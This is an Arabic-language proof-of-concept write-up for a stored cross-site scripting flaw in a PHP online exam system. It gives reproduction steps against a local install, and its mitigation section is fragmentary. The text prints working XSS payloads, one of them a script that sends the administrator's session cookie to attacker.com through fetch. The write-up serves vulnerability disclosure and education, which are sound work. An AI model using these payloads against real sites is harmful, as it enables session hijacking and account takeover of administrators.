
PoC لـ CVE-2025-46173
CVE-2025-46173 هي ثغرة تخزين سكربتات عبر المواقع (XSS) تم اكتشافها في Online Exam Mastering System 1.0 من code-projects. توجد الثغرة في مكوّن feedback.php حيث لا يتم تطهير إدخال المستخدم في حقل الاسم بشكل صحيح، مما يسمح لمهاجم ضار بحقن JavaScript عشوائي. عندما يعرض المسؤول هذه الملاحظات في لوحة التحكم (dash.php)، يتم تنفيذ الحمولة في متصفح المسؤول، مما يؤدي إلى اختطاف الجلسة واحتمال تصعيد الامتيازات.
feedback.php, dash.phpيرسل المستخدم الحمولة التالية في حقل الاسم في نموذج الملاحظات:
<script>alert(document.cookie)</script>

عندما يعرض المسؤول لاحقًا الملاحظات المقدَّمة في dash.php، يتم تنفيذ الحمولة:

يتم كشف ملف تعريف ارتباط الجلسة الخاص بالمسؤول عبر document.cookie، ويمكن سرقته:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
استنسخ أو قم بإعداد النسخة المصابة من code-projects.
انتقل إلى localhost/exam/feedback.php.
املأ حقل "الاسم" بالحمولة التالية:
<script>alert(document.cookie)</script>
أرسل النموذج.
سجّل الدخول كمسؤول وقم بزيارة dash.php?q=3 لعرض الملاحظات.
سيتم تنفيذ السكربت في سياق المسؤول.
الاستغلال الناجح يسمح للمهاجم عن بُعد بـ:
&، <، >، ").htmlspecialchars() الخاصة بـ PHP أو مزيج من التحقق في الواجهة الأمامية والتطهير في الخلفية.Pruthu Raut LinkedIn | TryHackMe أعلى 2% | GitHub
اللقطات لأغراض تعليمية فقط. تم إجراء جميع الاختبارات في بيئة محلية.
انقر هنا لمشاهدة فيديو العرض التوضيحي
يتم توفير هذه المعلومات للأغراض التعليمية والبحثية فقط. لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.